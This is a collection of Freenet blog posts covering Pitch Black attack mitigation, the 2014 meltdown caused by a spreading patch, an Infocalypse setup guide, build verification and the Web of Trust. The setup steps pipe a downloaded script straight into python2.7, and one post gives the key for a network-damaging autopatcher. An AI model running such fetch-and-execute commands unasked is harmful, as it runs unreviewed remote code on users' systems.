(d - d_mean) > d_er ensures that even if the peers have the same location (d_mean = 0), this is only treated as a gap if d is larger than the distance which would be found on 95% of routing tries in a random network, d_er. This ensures that even when there is a small optimized group within a large randomized network (for example when the network grows quickly), the nodes in the optimized group will not mistake the routing quality outside the optimized group for an attacked network.
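
Put together, the check can be written as a minimal Python sketch (route_to and initiate_swap are hypothetical placeholders for the node’s routing and swapping machinery; 0.037 is the d_er for outdegree 6 from above):

import random

def circular_distance(a, b):
    d = abs(a - b)
    return min(d, 1.0 - d)

def swap_or_fill_gap(node, d_er=0.037):
    """Route to a random location l, compare the reached distance d
    against the mean peer distance d_mean, and either fill the
    suspected gap or start a normal swap."""
    l = random.random()
    closest_location = route_to(node, l)              # hypothetical routing call
    d = circular_distance(closest_location, l)
    peer_distances = [circular_distance(node.location, peer.location)
                      for peer in node.peers]
    d_mean = sum(peer_distances) / len(peer_distances)
    if (d - d_mean) > d_er:
        node.location = l                             # fill the gap
    else:
        initiate_swap(node)                           # hypothetical swap call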

Adaptations

Median distance

During experimentation I found that using mean peer distance means that nodes with more long-distance connections are less likely to detect a gap. An attacker might be able to segment the network so that every node has a few long-distance connections to prevent detection of gaps. I tried to fix this using the median distance to peers instead of the mean distance, since the median is less sensitive to outliers.

use d_median instead of d_mean

This was the most effective adjustment, but I need help from someone with deeper knowledge about network statistics to test this.

Route to two targets

If the constant minimum distance for random networks (d_er) should prove problematic, we can reduce the value of d_er by doing two routing tries with different targets, checking the shorter of the two distances but switching to the target with the larger distance. d_er would then be only around 0.02 instead of 0.037, for example. But for this the simulation results have been unclear.

Avoid data loss

Update: Reinsertion is not needed, because a node which swaps to a random location will very likely swap back to a location closer to its neighbors within the next few swapping operations.

If a node changes its location by a large distance, this means that the content it holds cannot be found anymore. To fix this, it needs to re-insert all content in its store.

This is no large problem with basic swapping, because there the locations should stabilize, changing only in small ways. In case of an attack, it becomes important, though.

While it sounds expensive to re-insert all content in the store, it should not actually cost too much, since we can assume that most peers of the node will be close to its old location. So it could simply insert the content in its store with a HTL around 2 and still be confident to reach the right nodes.

Conclusion

This solution mitigates the Pitch Black Attack with moderate cost. Under attack the network no longer converges completely, but it still reaches a more optimized state which I would expect to suffice for routing.

It would be great to have more math on this, but I think it’s already ready for implementation.

Please comment!

Best wishes, Arne Babenhauserheide


  1. Stefanie Roos showed that efficient convergence is not possible under churn, but this should not affect Freenet too badly, because in friend-to-friend mode many connections are extremely long lived, often on the order of years. Therefore real churn (as in permanently lost connections) is extremely low compared to other systems which often have lifetimes on the order of hours. 

  2. This was shown by Christian Grothoff et al.: Nathan S. Evans, Chris GauthierDickey and Christian Grothoff: “Routing in the Dark: Pitch Black”, 23rd Annual Computer Security Applications Conference (ACSAC 2007), IEEE Computer Society, 2007, pages 305–314. http://grothoff.org/christian/pitchblack.pdf

    Abstract: “In many networks, such as mobile ad-hoc networks and friend-to-friend overlay networks, direct communication between nodes is limited to specific neighbors. Often these networks have a small-world topology; while short paths exist between any pair of nodes in small-world networks, it is non-trivial to determine such paths with a distributed algorithm. Recently, Clarke and Sandberg proposed the first decentralized routing algorithm that achieves efficient routing in such small-world networks.

    This paper is the first independent security analysis of Clarke and Sandberg’s routing algorithm. We show that a relatively weak participating adversary can render the overlay ineffective without being detected, resulting in significant data loss due to the resulting load imbalance. We have measured the impact of the attack in a testbed of 800 nodes using minor modifications to Clarke and Sandberg’s implementation of their routing algorithm in Freenet. Our experiments show that the attack is highly effective, allowing a small number of malicious nodes to cause rapid loss of data on the entire network.

    We also discuss various proposed countermeasures designed to detect, thwart or limit the attack. While we were unable to find effective countermeasures, we hope that the presented analysis will be a first step towards the design of secure distributed routing algorithms for restricted-route topologies.”

News of the day — and using Freenet as decentralized, pseudonymous communication backend for applications

This is a proposal I wrote for the NLnet Open call for funding 2016-12. It made the short list but was not selected, so I’m sharing it here. Maybe it sparks your interest or serves as inspiration for something exciting you want to realize with Freenet. I still plan to do this, but in hobby-time it will likely take a few years to realize instead of the 6 months I had planned. Initial work is available in pyFreenet/babcom_cli

The project

The goal of this project is to provide a working, anonymous communication system which can be used as library to add privacy-respecting communication features to any application.

The focus of the communication system is providing the news-of-the-day. News-of-the-day is a concept to reduce information overload: Every user can select the two most important news items of the day which are then shared with his or her subscribers on the next day. One of these is self-written, one is forwarded from other news items the user saw.

By avoiding any centralized infrastructure, the project will be free of the external pressures (e.g. needing to fund the infrastructure through advertisements, or attempts to censor information) which cause other projects to focus on engagement instead of actual news.

To provide these features, it builds on Freenet, a decentralized platform for pseudonymous publishing and communication which was started in 2000 and is currently used by about 8000 people. Freenet provides publishing under a pseudonym without needing to run a server as well as completely decentralized spam-prevention. The spam-prevention will also allow users to limit fake-news by treating pseudonyms who repeatedly promote fake-news as spammers.

The target community

The community is twofold: On the one hand desktop-users who want to reduce their information overload without missing important news items, with “important” as defined by the following quote:

“Whatever a patron desires to get published is advertising; whatever he wants to keep out of the paper is news,” — 1918, Anonymous (quoted in The Fourth Estate: A Newspaper for the Makers of Newspapers)

On the other hand application developers who want to add communication features into their programs without having to worry about violating the privacy of their users when a server is breached and without having to build and maintain a centralized back-end infrastructure.

Usage of the money

10 000€ will be used to improve the scalability of the spam-prevention method in Freenet¹ and another 10 000€ to improve the response times². These are the two tasks I cannot do easily myself. In addition, 4000€ will be used to allow me to reduce my working hours for 3 months without impacting the family budget too strongly. Another 1000€ will be used for presenting the project at programming conventions.

¹: Improving the scalability should require about 6 weeks of work in the ideal case, with 10 weeks the more realistic estimate. This will be done by hiring the main developer of the spam-prevention method for implementing the detailed plan described in this task: https://bugs.freenetproject.org/view.php?id=3816#c12182

²: The spam-prevention method in Freenet reacts slowly due to over-locking. I will hire an external developer to profile the code and solve the problems which impact the use-cases relevant for my project.

What is new?

On the feature-side, the new approach is encouraging the users to choose only a limited number of most important items, while providing real anonymity along with decentralized spam-protection so users can promote what they deem newsworthy without having to worry about their public image.

On the technical side, the main new approach is to tie together established and tested methods provided by Freenet (this has never been done before, partly due to missing documentation how to harness them) and to use these methods for implementing communication features in external applications.

The technical approach is described in the Freenet Communication Primitives I published end of last year: http://www.draketo.de/light/english/freenet/communication-primitives-2-discovery

This project will also form the core of the third part of the Freenet Communication Primitives.

How will you promote the project to your target community?

To reach users as early adopters, I will promote early stages directly in Freenet. When the system reaches stability, I will contact websites which write about privacy-tools. I am already in contact with one of the writers for deepdotweb, which has a good reach into the group of privacy-aware people who are willing and able to invest time into trying a new tool.

To reach developers, I will present the project at programming conventions, which are one of the major sources of actionable information about usable libraries. I will back this with simple tutorials about using the project to add communication tools to other programs.

On the 2014 freenet-meltdown

Update (2018-04-14): After 3 years of testing we could confidently decrease the minimum required connections to 6 (for 10 KiB/s upload speed) and still get good scaling thanks to the link length fix. This was released as Freenet build 1480. This yielded the same transfer speeds with lower CPU requirements and with much better scaling for high bandwidth nodes.

Update (2014-09-06): The meltdown is stopped and reversed. We implemented the link length fix and this solved an issue with the network structure we had for the last few years. We’re currently watching anxiously whether the performance only comes back to the level before the meltdown or whether the lifetime actually gets much better. Watch the fetch-pull stats!

Current Fetch Performance, 1 day

^ inserted one day ago: You see the meltdown starting in April and the improvement with the latest version: It’s back to at least the level before the meltdown.

Current Fetch Performance, 4/2 weeks

^ 4 weeks ago inserted, 2 weeks ago accessed. If this goes above 0.6 starting 2014-09-19, the improvement could prove to be huge: It could give us much longer lifetimes of data in freenet.

Update (2014-07-23): The fetch-pull graphs look like we have an oscillation here. This could mean that this is NOT an attack, but rather the direct effect of the KittyPorn patches: First the good connections get broken. This ruins the network. Then they can’t get any worse and the network recovers. Then they break again. This is still speculative. For an up to date plot, see fetchplots1.

Update (2014-05-22): The performance stats are much better again and the link-length distribution recovered. We might have been hit by an attack after all (which failed to take down freenet, but hurt quite a bit). With some luck we’ll soon see a paper published with the evaluation of the attack and ways to mitigate it cleanly. (hint to computer scientists: we link to papers from the freenetproject.org website, so if you want to get a small boost for your chances of citation, send the link to your paper to devl@freenetproject.org)

Summary: There is a freenet patch floating around which claims to increase performance. The reality is (to our current knowledge) that it breaks the network as soon as more than a few percent of nodes run it. And this is the case, which is why the network is almost completely broken right now. If you run that patch, please get rid of it!

Freenet is currently experiencing a meltdown, with extremely slow downloads, high connection churn and lifetimes for bigger files down to about a day. For a visualization, see the fetch-performance in the following graph and take note of the drop at the end. It nicely shows how a bad patch spread while more and more users installed it (hoping for better performance) and slowly killed the network. When that line goes below 50%, bigger files are dead approximately one day after being uploaded.

Fetch Performance (thanks for these stats goes to fetchpull from digger3)

We suspect that patch, because the number of nodes reporting 100 or more connections in the anonymised probe-stats increased a lot over the past few weeks (this is only possible with a patched freenet) and the link-length-distribution almost completely lost a bump it had at 0.004, suggesting that freenet essentially reverted to random routing, while the number of nodes did not change significantly.

connections per node
link length distribution
number of freenet nodes which report stats
(thanks for these stats goes to probe stats which operhiem1 implemented in Google Summer of Code 2012)

We are working on creating a clean solution.

Freesites still work, because the SSK-queue did not get hammered, so if you are a freesite author, please inform your readers about the patch and ask them to get rid of it!

In case you use freenet and want information on that patch, please read the note from TheSeeker:

Information from TheSeeker in IRC (#freenet @ freenode)

Recently Kittyporn released an autopatcher-script: CHK@r6dUGAYs2No4lWT3DTkY2dIYdgA-eoBAcU~U-kLU-0I,hxGN5OTN4j~04YnCS4UTflMK4fpW2hfhB58CU1KNRAw,AAMC--8/FNAutoPatch-1.0_by_Kittyporn.rar

This increased usage of the patch by probably several hundred nodes, judging by the partial logs from the webserver that we have for fetches of the source tarball.

The script stupidly pulls the freenet source from freenetproject.org rather than, say, github or freenet. Really bad for anonymity, but good for tracking.

logs only go back a couple weeks, which is why they are incomplete, and we don't know the real number of people that have run it. hard to tell how much less the people that are cheating feel the effects of the whole network collapsing around them. surely can't be long before they too start complaining about speeds given the data retention issues it's causing.

NLM was supposed to fix all this shit. :|

modified nodes are flooding the network, creating broad backoff issues. this makes routing suffer, and avg path lengths increase, which reduces overall availability of bandwidth and more backoff and more misrouting. Death spiral until we hit some equilibrium that is roughly equal to random routing.

essentially what the broken NLM did. thankfully, it is only routing for bulk chk, so it'll still be possible to do some things if forced through the realtime queue... e.g. if we want to deploy an update, and have the constituent blocks actually get routed anywhere near the correct destination...

Additional comment

To do the math: a few hundred users easily equals 10% of the network. No wonder we have a meltdown.

And even worse: these few hundred users are likely the high-bandwidth folks with a huge number of connections.

Let’s assume that they each have 40 connections while the others have ~10. Every node connected to such an abusive node will essentially be blocked. That’s 100% of the nodes…

40 other nodes wrecked × 10% = ouch!

Attachments:
fetchpull-stats-1148-fetchplots1.png (43.8 KB)
probe-stats-489-plot_link_length.png (6.67 KB)
probe-stats-489-plot_peer_count.png (7.64 KB)
probe-stats-489-year_900x300_plot_network_size.png (26.24 KB)
fetchpull-stats-1228-fetchplots1.png (46.38 KB)

Real Life Infocalypse

Freenet Logo: Follow the Rabbit
DVCS in the Darknet. The decentralized p2p code repository.

In this guide I show by example how you can use the Infocalypse plugin for distributed development without a central point of failure or reliance on unfree tools.12

If you think “I have no idea what this tool is for”: Infocalypse gives you fully decentralized Github with real anonymity, using only free software.

# freenet -> local
hg clone freenet://ArneBab/life-repo
# local -> freenet
hg clone life-repo real-life
hg clone real-life freenet://ArneBab/real-life
# send pull request
cd real-life
hg fn-pull-request --wot ArneBab/life-repo
(enter message)
# check for pull-requests
cd ../life-repo
sleep 1800 # (wait for confidential delivery)
hg fn-check-notifications --wot ArneBab

If you like this, please don’t only click like or +1, but share it with everyone who could be interested. The one who knows best how to reach your friends is you — and that’s how it should be.

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

Setup

(I only explain the setup for GNU/Linux because that’s what I use. If you want Infocalypse for other platforms, come to the #freenet IRC channel so we can find the best way to do it)

Freenet Setup

Install and start Freenet. This should just take 5 minutes.

Then activate the Web of Trust plugin and the Freemail plugin. As soon as your Freenet is running, you’ll find the Web of Trust and Freemail plugins on the Plugins-Page. This link will work once you have a running Freenet. If you want to run Freenet on another computer, you can make it accessible to your main machine via ssh port forwarding: ssh -NL 8888:localhost:8888 -L 9481:localhost:9481 <host>.

Now create a new Pseudonym on the OwnIdentities-page.

Infocalypse Setup

Install Mercurial, defusedxml, PyYAML for Python2. The easiest way of doing so is using easy_install from setuptools:

cd ~/
echo '
export PATH="${PATH}:~/.local/bin:~/bin"
export PYTHONPATH="${PYTHONPATH}:~/.local/lib64/python2.7:~/.local/lib/python2.7"
export PYTHONPATH="${PYTHONPATH}:~/lib/python2.7:~/lib64/python2.7"
' >> ~/.bashrc
source ~/.bashrc
wget https://bootstrap.pypa.io/ez_setup.py -O - | python2.7 - --user
easy_install --user --egg Mercurial defusedxml PyYAML pyFreenet==0.4.0

Then get and activate the Infocalypse extension:

hg clone https://hg.sr.ht/~arnebab/infocalypse
echo '[extensions]' >> ~/.hgrc
echo 'infocalypse=~/infocalypse/infocalypse' >> ~/.hgrc

Infocalypse with Pseudonym

Finally setup Infocalypse for the Pseudonym you created on the OwnIdentities-page. The Pseudonym provides pull-requests and allows for shorter repository URLs.1

hg fn-setup --truster <Nickname of your Web of Trust Pseudonym>
hg fn-setupfreemail --truster <Nickname of your Web of Trust Pseudonym>

That’s it. You’re good to go. You can now share your code over Freenet.

Welcome to the Infocalypse!

Example

This example shows how to share code over Freenet (using your Pseudonym instead of ArneBab).

# Create the repo
hg init life-repo
cd life-repo
echo "my" > life.txt
hg commit -Am "first steps"
cd ..

# Share the repo
hg clone life-repo freenet://ArneBab/life-repo

# Get a repo and add changes
hg clone freenet://ArneBab/life-repo real-life
cd real-life
echo "real" > life.txt
hg commit -m "getting serious"

# Share the repo and file a pull-request
hg clone . freenet://ArneBab/real-life
# the . stands for "the current folder"
hg fn-pull-request --wot ArneBab/life-repo # enter a message
cd ..

# Check for pull-requests and share the changes
cd life-repo
hg fn-check-notifications --wot ArneBab
hg pull -u freenet://ArneBab/real-life
hg push freenet://ArneBab/life-repo

Privacy Protections

Infocalypse takes your privacy seriously. When you clone a repository from freenet, your username for that repository is automatically set to “anonymous” and when you commit, the timezone is faked as UTC to avoid leaking your home country.

If you want to add more security to your commits, consider also using a fake time-of-day:

hg commit -m "Commit this sometime today" --date \
   "$(date -u "+%Y-%m-%d $(($RANDOM % 24)):$(($RANDOM % 60)):$(($RANDOM % 60)) +0000")"

Open path/to/repo-from-freenet/.hg/hgrc to set this permanently via an alias (just adapt the alias for rewriting the commit-date to UTC - these are already in the hgrc file if you cloned from Freenet).

Background Information

Let’s look at a few interesting steps in the example to highlight the strengths of Infocalypse, and provide an outlook with steps we already took to prepare Infocalypse for future development.

Efficient storage in Freenet

hg clone life-repo freenet://ArneBab/life-repo

Here we clone the local repository into Freenet. Infocalypse looks up the private key from the identity ArneBab. Then it creates two repositories in Freenet: <private key>/life-repo.R1/0 and <private key>/life-repo.R0/0. The URLs only differ in the R1 / R0: They both contain the same pointers to the actual data, and if one becomes inaccessible, the chances are good that the other still exists. Doubling them reduces the chance that they fall out and become inaccessible, which is crucial because they are the only part of your repository which does not have 100% redundancy. Also these pointers are the only part of the repository which only you can insert. As long as they stay available, others can reinsert the actual data to keep your repository accessible.

To make that easy, you can run the command hg fn-reinsert in a cloned repository. It provides 5 levels:

  • 1 - re-inserts the top key(s)
  • 2 - re-inserts the top key(s), graph(s) and the most recent update.
  • 3 - re-inserts the top key(s), graph(s) and all keys required to bootstrap the repo (default).
  • 4 - adds redundancy for big (>7Mb) updates.
  • 5 - re-inserts existing redundant big updates.
To reinsert everything you can insert, just run a tiny bash-loop:

for i in {1..5}; do hg fn-reinsert --level $i; done

Let’s get to that “actual data”. When uploading your data into Freenet, Infocalypse creates a bundle with all your changes and uploads it as a single file with a content-dependent key (a CHK). Others who know which data is in that bundle can always recreate it exactly from the repository.

When someone else uploads additional changes into Freenet, Infocalypse calculates the bundle for only the additional changes. This happens when you push:

hg push freenet://ArneBab/life-repo

To clone a repository, Infocalypse first downloads the file with pointers to the data, then downloads the bundles it needs (it walks the graph of available bundles and only gets the ones it needs) and reassembles the whole history by pulling it from the downloaded bundles.

hg clone freenet://ArneBab/life-repo real-life

By reusing the old bundles and only inserting the new data, Infocalypse minimizes the amount of data it has to transfer in and out of Freenet, and more importantly: Many repositories can share the same bundles, which provides automatic deduplication of content in Freenet. When you take into account that in Freenet frequently accessed content is faster and more reliable than rarely accessed content, this gives Infocalypse a high degree of robustness and uses the capabilities of Freenet in an optimal way.

If you want to go into Infocalypse-specific commands, you can also clone a repository directly to your own keyspace without having to insert any actual data yourself:

hg fn-copy --requesturi USK@<other key>/<other reponame>.R1/N \
   --inserturi USK@<your key>/<your reponame>.R1/N

Pull requests via anonymous Freemail

Since the Google Summer of Code project from Steve Dougherty in 2013, Infocalypse supports sending pull-requests via Freemail, anonymous E-Mail over Freenet.

hg fn-pull-request --wot ArneBab/life-repo # enter a message
hg fn-check-notifications --wot ArneBab

This works by sending a Freemail to the owner of that repository which contains a YAML-encoded footer with the data about the repository to use.

You have to trust the owner of the other repository to send the pull-request, and the owner of the other repository has to trust you to receive the message. If the other does not trust you when you send the pull-request, you can change this by introducing your Pseudonym in the Web of Trust plugin (this means solving CAPTCHAs).

Convenience

To make key management easier, you can add the following into path/to/repo/.hg/hgrc

[paths]
default = freenet://ArneBab/life-repo
real-life = freenet://ArneBab/real-life

Now pull and push will by default go to freenet://ArneBab/life-repo and you can pull from the other repo via hg pull real-life.

Your keys are managed by the Web of Trust plugin in Freenet, so you can use the same freenet-uri for push and pull, and you can share the paths without having to take care that you don’t spill your private key.

DVCS WebUI

When looking for repositories with the command line interface, you are reliant on finding the addresses of repositories somewhere else. To ease that, Steve also implemented the DVCS WebUI for Freenet during his GSoC project. It provides a web interface via a Freenet plugin. In addition to providing a more colorful user interface, it could add 24/7 monitoring, walking remote repositories and pre-fetching of relevant data to minimize delays in the command line interface. It is still in rudimentary stages, though.

All the heavy lifting is done within the Infocalypse Mercurial plugin: Instead of implementing DVCS parsing itself, the DVCS WebUI asks you to connect Infocalypse so it can defer processing to it:

hg fn-connect

The long-term goal of the DVCS WebUI is to provide a full-featured web interface for repository exploration. The current version provides the communication with the Mercurial plugin and lists the paths of locally known repositories.

You can get the DVCS WebUI from http://github.com/Thynix/plugin-Infocalypse-WebUI

Gitocalypse

If you prefer working with git, you can use gitocalypse written by SeekingFor to seamlessly use Infocalypse repositories as git remotes. Gitocalypse is available from https://github.com/SeekingFor/gitocalypse

The setup is explained in the README.

Troubleshooting

  • When I'm running "hg fn-setup" I get the error "abort: No module named fcp.node"
    Do you have pyFreenet installed? Also ensure that you installed it for python 2.
    wget bootstrap.pypa.io/ez_setup.py -O - | python2.7 - --user
    easy_install --user --egg Mercurial defusedxml PyYAML pyFreenet==0.4.0

Conclusion

Infocalypse provides hosting of repositories in Freenet with a level of convenience similar to GitHub or Bitbucket, but decentralized, anonymous and entirely built of Free Software.

You can leverage it to become independent from centralized hosting platforms for sharing your work and collaborating with other hackers.


  1. This guide shows the convenient way of working, which has a higher barrier of entry. It uses WoT Pseudonyms to allow you to insert repositories by Pseudonym and repository name. If you can cope with inserting by private key and sending pull-requests manually, you can use it without the WoT, too, which reduces the setup effort quite a bit. Just skip the setup of the Web of Trust and Freemail plugins. You can then clone the life repo via hg clone freenet://USK@6~ZDYdvAgMoUfG6M5Kwi7SQqyS-gTcyFeaNN1Pf3FvY,OSOT4OEeg4xyYnwcGECZUX6~lnmYrZsz05Km7G7bvOQ,AQACAAE/life-repo.R1/4 life-repo. See hg fn-genkey and hg help infocalypse for details.

  2. Infocalypse shows one of many really interesting possibilities offered by Freenet. To get a feeling of how much more is possible, have a look at The Forgotten Cryptopunk Paradise

Reproducible build of Freenet do-it-yourself: verify-build demystified

You might know the reproducible-builds project, which tries to allow users to verify that what they install actually corresponds to the released source. Or GNU Guix, which provides transparent reproducible binaries — along with a challenge-function.

Given that Freenet is made for people with high expectations for integrity, it might not surprise you that Freenet has been providing a verifiable1 build and a verification script since 2012. However, until release 1481, it was a hassle to set up, and few people used it.

But now that we’re on gradle, verifying that what I release is actually what’s tagged in the source is much easier than before.

The following instructions are for GNU/Linux, and maybe other *nixes, allowing you to verify the test release of 1482. You can easily adapt them for future releases.

preparation

First off: to verify 1482 you NEED Java 7 - in general you need the Java version I release with. I hope that starting with 1483 it will be Java 8.

Update 2022: Now it’s Java 8.

get the release

Start by downloading the jar: SSK@…/jar-1482 (needs a running Freenet)

Copy it to /tmp/freenet-1482.jar

verify it

Then run the following:

failureWarning="FAILED TO VERIFY.
If you determine that this failure is not due to build environment differences,
then the source files used to build the published version of Freenet are 
different from the published source files. The build has been compromised.
Take care to only run version of Freenet with published, reviewable source code, 
as compromised versions of Freenet could easily contain back doors."

cd /tmp/
git clone git@github.com:freenet/fred.git
cd fred
git checkout build01482
./gradlew jar
mv build/libs/freenet.jar ../freenet-built.jar
cd ..

mkdir unpacked-built
unzip freenet-built.jar -d unpacked-built
(cd unpacked-built; find -type f) | sort > unpacked-built.list

mkdir unpacked-official
unzip freenet-1482.jar -d unpacked-official
(cd unpacked-official; find -type f) | sort > unpacked-official.list

if ! cmp unpacked-official.list unpacked-built.list; then
    echo FAILED TO VERIFY: Different files in official vs built
    echo Files in official but not in built are marked as +
    echo Files in built but not in official are marked with -
    diff -u unpacked-built.list unpacked-official.list
    echo ""
    echo "$failureWarning"
fi

while read x; do
    if ! cmp "unpacked-official/$x" "unpacked-built/$x"; then
        if [[ "$x" = "./META-INF/MANIFEST.MF" ]]; then
            echo "Manifest file is different; this is expected."
            echo "Please review the differences:"
            diff "unpacked-official/$x" "unpacked-built/$x"
        else
            echo "File is different: $x"
            echo "$x" >> "differences"
        fi
    fi
done < unpacked-official.list

if [[ -s "differences" ]]; then
    echo VERIFY FAILED: FILES ARE DIFFERENT:
    cat differences
    echo ""
    echo "$failureWarning"
fi

celebrate!

That’s it. You just verified release 1482 of Freenet. If that code does not shout a huge warning at you, then what I released is actually what is tagged and signed as 1482 in the source.

PS: This is a shorter and somewhat cleaned up version of the verify-build script.

PPS: Yes, there is also a docker solution. I cannot test it right now, though, because my docker does not work. Ask in IRC (#freenet on libera.chat).


  1. Since Java puts timestamps into class files and requires signing of jars, the jar is not byte-by-byte reproducible, but the verify-build script unpacks the jar and compares the class-files, ensuring that they only differ in timestamps and similar details that do not affect functionality.

Spread Freenet: A call for action

Freenet Logo: Follow the Rabbit
“Daddy, where were you, when they took the freedom of the press away from the internet?” — Mike Godwin, Electronic Frontier Foundation

Reposted from Freetalk, the distributed pseudonymous forum in Freenet.

For all those among you who use twitter, identi.ca, and/or other social networks, this is a call to action.

Go to your social networking accounts and post about freenet. Tell us in 140 characters why freenet is your tool of choice, and remember to use the #freenet hashtag, so we can resend your posts!

I use freenet because we might soon need it as safe harbour to coordinate the fight against censorship → freenetproject.org

The broader story is the emerging concept of a right to freely exchange arbitrary data — Toad (former lead developer of freenet)

Background

There are still very many people out there who don’t know what freenet is. Just today a coder came into the #freenet IRC channel, asked what it did and learned that it already does everything he had thought about. And I still remember someone telling me “It would be cool if we had something like X-net from Cory Doctorow’s ‘Little Brother’” — he did not know that freenet already offers that with much improved security.

So we need to get the word out about freenet. And we have powerful words to choose from, beginning with Mike Godwin’s quote above but going much further. To just name a few buzz-words: Freenet is a crowdfunded distributed and censorship resistant freesoftware cloud publishing system. And different from info about corporate PR-powered projects, all these buzz words are true.

But to make us effective, we need to achieve critical mass. And to reach that, we need to coordinate and cross promote heavily.

Call to action

So I want to call on you to go to your social networking accounts and post about freenet. Tell us in 140 characters why freenet is your tool of choice, and remember to use the #freenet hashtag, so we can find and retweet your posts!

We can make a difference, if we fight together.

Additional info

Besides: My accounts are:

But no need to tell me your account. Just use your current social network of choice and remember to tell your friends to talk about freenet, too.

I hereby allow anyone to reuse this article in any form and under any license (up to the example tweets), so I can’t know who saw it here and who saw it elsewhere.

http://draketo.de/light/english/spread-freenet-a-call-to-action-on-twitter-and-identica

I hope I’ll soon see floods of enthusiastic tweets about Freenet!

Some example tweets

I’ll gladly post and link yours here, if you allow it!

#Freenet: #crowdfunded distributed and censorship resistant #freesoftware cloud publishing → http://freenetproject.org — rightful buzz!

#imhappiestwhen when the internet is free. I hope it will remain so thanks to projects like #Freenet http://t.co/GMRXmDt — Gaming4JC

#freenet: freedom to publish that you may have to rely on, because censorship and ©ensorship are on the rise — Ixoliva

→ Install Freenet ←

Freenet

https://freenetproject.org

The Freenet Web of Trust keeps communication friendly with actual anonymity

In the past decade there hasn’t been a year without a politician calling for real names on the internet. Some even want to force people to use real photos as profile pictures. All in the name of stopping online hate, though enforcing real names has long been shown to actually make the problem worse.

This article presents another solution, one that has actually proven that it keeps communication friendly, even in the most anonymous environment of the fully decentralized Freenet project.

And that solution does work without enabling censorship and harassment (as requiring real names would).

History

The Web of Trust (WoT) was conceived when Frost, one of the older forums on Freenet, broke down due to intentional disruption: some people realized that full anonymity also allowed for automatic spamming without repercussions. For several months they drowned every board in spam, so people had to spend so much time ignoring spam that constructive communication mostly died.

Those spammers turned censorship resistance on its head and censored with spam, similar to people who claim that free speech means that they have the right to shout down everyone who disagrees with them. Since the one central goal of Freenet is censorship resistance, something had to be done. The problem of Frost was that everyone could always write to everyone. Instead of going into an arms race of computing power or bandwidth, Freenet developers set out to encode decentralized reputation into communication, focused on stopping spam.

How it works

To make your messages visible to others, you have to be endorsed by someone they trust. When someone answers some of your messages without marking you as spammer, that means endorsement. To get initial visibility, you solve CAPTCHAs which makes you visible to a small number of people. This is similar to having moderators with a moderation queue, but users choose their own moderators.

If someone now starts spamming, users who see the messages mark the sender as a spammer. To decide whose messages to see, users sum up all the endorsements (positive) and spam-marks (negative), weighted by their closeness in social interaction to the ones who gave them. If the total result is negative, the messages of the spammer are not even downloaded.
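
As a rough sketch of that rule (illustrative names and weighting only, not the actual Web of Trust code):

def message_is_downloaded(ratings, closeness):
    """ratings: rater -> +1 (endorsement) or -1 (marked as spammer).
    closeness: rater -> weight derived from social interaction (0 if unknown).
    The message is only downloaded if the weighted sum is not negative."""
    score = sum(value * closeness.get(rater, 0)
                for rater, value in ratings.items())
    return score >= 0

# Example: two endorsements from closer contacts outweigh one distant spam-mark
print(message_is_downloaded({"alice": 1, "bob": 1, "eve": -1},
                            {"alice": 0.9, "bob": 0.5, "eve": 0.3}))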

That method still provides full anonymity, but with accountability: you pay for misbehavior by losing visibility. This is the inverse of Chinese censorship: in China you get punished if your message reaches too many people. In Freenet you become invisible to the ones you annoy — and to those who trust them but not you (their own decision always wins).

But wait, does that actually work? Turns out that it does, because it punishes spammers by taking away visibility, the one currency spammers care about.

It is the one defence against spam which inherently scales better than spamming. And it keeps communication friendly.

Experience

I have now repeated the claim three times (including in the title) that the WoT keeps communication friendly. Let’s back it up. Why do I say that the WoT keeps communication friendly?

For the last decade, Freenet has been providing three discussion systems side by side. One is Frost, without Web of Trust. One is FMS, with user-selected moderators as Web of Trust. And the third is Sone, with propagating trust as Web of Trust. On Frost you see what happens without these systems. Insults fly high and the air is filled with hate and clogged by spam. Consequently it is very likely that FMS and Sone are a target of the same users. With no centralized way of banning someone, they face a harder challenge than most systems on the clearnet (though with much less financial incentive).

Yet discussions are friendly, constructive and often controversial. Anarchists, agorians, technocrats, democrats, LGBT activists and religious zealots discuss without going at each other’s throats.

And since this works in Freenet, where very different people clash without any fear of real-life repercussions, it can work everywhere.

Further reading

Use in other systems

How can this be applied to systems outside Freenet — for example federated microblogging like GNU social?

You can map the inputs the Web of Trust needs (as described in the scalability calculation) onto information which is already available in the federation:

  • As WoT identity, use the URL of a user on an instance. It is roughly controlled by that user.
  • As peer trust from Alice to Bob: if Alice follows Bob, use a trust of 100 - (100 / number of messages from Alice to Bob).
  • As negative trust use a per-user blacklist (blocked users).
  • For initial visibility, just use visibility on the home instance.

These together reduce global moderation to moderation on a smaller instance and calculations based on existing social interaction.
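
A small sketch of the peer-trust mapping from the list above (the guard against zero messages is my own assumption):

def peer_trust(alice_follows_bob, messages_from_alice_to_bob):
    """Trust from Alice to Bob: only defined if Alice follows Bob,
    rising towards 100 with the number of messages Alice sent to Bob."""
    if not alice_follows_bob:
        return None
    messages = max(messages_from_alice_to_bob, 1)  # assumption: avoid division by zero
    return 100 - (100 / messages)

# peer_trust(True, 1) -> 0.0, peer_trust(True, 4) -> 75.0, peer_trust(True, 100) -> 99.0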

If you want to get a feeling of how this works, install Freenet and FMS or Sone and just test it yourself. Both are Free Software and available to anyone:
freenetproject.org
FMS
Sone

(Finally typed down while listening to a podcast by techdirt about content moderation)

The Freenet social trust graph

Are trust relationships different in anonymous networks? This article should give you the tools to find out.

Update 2017: Now available from figshare with DOI 10.6084/m9.figshare.4725664

Update 2020: This data was used in Fuzzy Graph Modelling of Anonymous Networks (2018)!

Update 2020-11: Added graph of WoT under attack.

Recently we were asked in the #freenet IRC channel whether we have a copy of the trust graph in the Web of Trust plugin (which provides service discovery and spam protection). While there is an easy way to get the non-spamming identities directly from the plugin (see wotutil), I decided to take the opportunity to do some Guile hacking: Crawling all the identities to dump a full copy of the trust graph. This also gives us IDs which are marked as spammers, and consequently ignored by the Web of Trust plugin.

So, first off, this is how the whole trust graph looks, about 13,000 identities and 250,000 trust relationships, with the size of the nodes showing the analyzed hub-value of the identities and the color showing the Eigenvector Centrality. Many of the nodes overlap, since the graph layout in Gephi took hours to optimize it.

[image: the full trust graph]

This is the 2020-11-01 graph, likely attackers in red, circles packed by hubbiness with Mike Bostock's Algorithm (also Gephi, but fast):

2020-11-01

